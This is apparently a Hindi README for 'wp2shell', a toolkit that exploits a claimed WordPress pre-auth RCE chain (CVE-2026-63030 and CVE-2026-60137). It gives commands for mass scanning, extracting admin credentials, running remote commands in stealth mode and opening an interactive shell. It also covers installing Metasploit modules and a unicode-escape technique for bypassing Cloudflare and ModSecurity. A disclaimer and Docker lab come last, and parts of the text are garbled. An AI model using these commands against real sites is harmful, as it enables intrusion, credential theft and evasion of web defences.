
वर्डप्रेस प्री-ऑथ RCE एक्सप्लॉइट + स्कैनर + WAF बाईपास | CVE-2026-63030 + CVE-2026-60137 | Go + Python + Metasploit मॉड्यूल + Docker लैब
___ __ ___
_ _____ |__ \ ___/ /_ ___ / / /
| | /| / / _ \ __/ // __/ __ \/ _ \/ / /
| |/ |/ / __// __//_ / / / / __/ / /
|__/|__/\___//____//__/_/ /_/\___/_/_/
WordPress Pre-Auth RCE — CVE-2026-63030 + CVE-2026-60137
Venexy (M4xSec) द्वारा
WordPress 6.8.0–6.8.5, 6.9.0–6.9.4, 7.0.0–7.0.1 पर अप्रमाणित रिमोट कोड निष्पादन। 6.8.6, 6.9.5, 7.0.2 में पैच किया गया।
# Pre-compiled binary (fastest)
curl -sL https://github.com/M4xSec/wp2shell-Exploit-Waf-Bypass/releases/download/v1.0.0/wp2shell-linux-amd64 -o wp2shell && chmod +x wp2shell
# Or build from source
go build -o wp2shell go-scanner/wp2shell-master.go
parse_request() एक जाली व्यवस्थापक बनाता हैgo-scanner/wp2shell-master.go)एक ही बाइनरी में सब कुछ — स्कैन, जाँच, रीड, एक्सप्लॉइट, इंटरैक्टिव शेल।
go build -o wp2shell-master go-scanner/wp2shell-master.go
# Mass scan
./wp2shell-master scan -f targets.txt -j -t 20
# Confirm SQLi
./wp2shell-master check https://target.com --waf --delay 3.0
# Extract admin creds
./wp2shell-master read https://target.com --preset users
# Pre-auth RCE (no password needed)
./wp2shell-master rce https://target.com --cmd id -y --waf --stealth
# Interactive shell
./wp2shell-master rce https://target.com -i -y
waf-bypass/)SQL कीवर्ड्स के JSON यूनिकोड एस्केपिंग के माध्यम से Cloudflare/ModSecurity बाईपास के लिए स्टैंडअलोन स्क्रिप्ट्स।
core.py — WAF बाईपास के साथ साझा ब्लाइंड SQLi इंजनdump_version.py — @@version निकालेंdump_dbname.py — DATABASE() निकालेंdump_tables.py — तालिकाओं को सूचीबद्ध करेंdump_columns.py — कॉलमों को सूचीबद्ध करेंrce_shell.py — WAF बाईपास के साथ पूर्ण RCE श्रृंखलाmetasploit-modules/)स्थानीय रूप से स्थापित करें:
mkdir -p ~/.msf4/modules/exploits/multi/http
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp metasploit-modules/wp2shell_rce.rb ~/.msf4/modules/exploits/multi/http/wp_wordpress_batch_rce.rb
cp metasploit-modules/wp2shell_scanner.rb ~/.msf4/modules/auxiliary/scanner/http/wp_wordpress_batch_sqli.rb
Cloudflare WAF कच्चे JSON बाइट्स का निरीक्षण करता है, लेकिन पैटर्न मिलान से पहले \uXXXX एस्केप सीक्वेंस को डिकोड नहीं करता। WordPress की PHP json_decode() उन्हें पारदर्शी रूप से डिकोड करती है।
SLEEP → SLEEP — कीवर्ड डिटेक्शन को बायपास करता है: के बजाय http://:) — छोटा, URI पैटर्न नियमों से बचता है/wp-json/batch/v1 permalink पथ — ?rest_route= ब्लॉकिंग से बचता हैOrigin + Referer हेडर लक्ष्य डोमेन से — CORS/समान-उत्पत्ति जाँच संतुष्ट करता हैcd lab
docker compose up -d --build
# WordPress 6.9.0 at http://localhost:8888
# Admin: admin / Summer2026!
Cloudflare-शैली नियमों के साथ ModSecurity CRS (OWASP) — यूनिकोड बाईपास की पुष्टि हुई।
cd lab/waf
docker compose up -d --build
# WordPress behind WAF at http://localhost:9999
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है। केवल उन सिस्टम्स पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। अनधिकृत पहुँच अवैध है।
MIT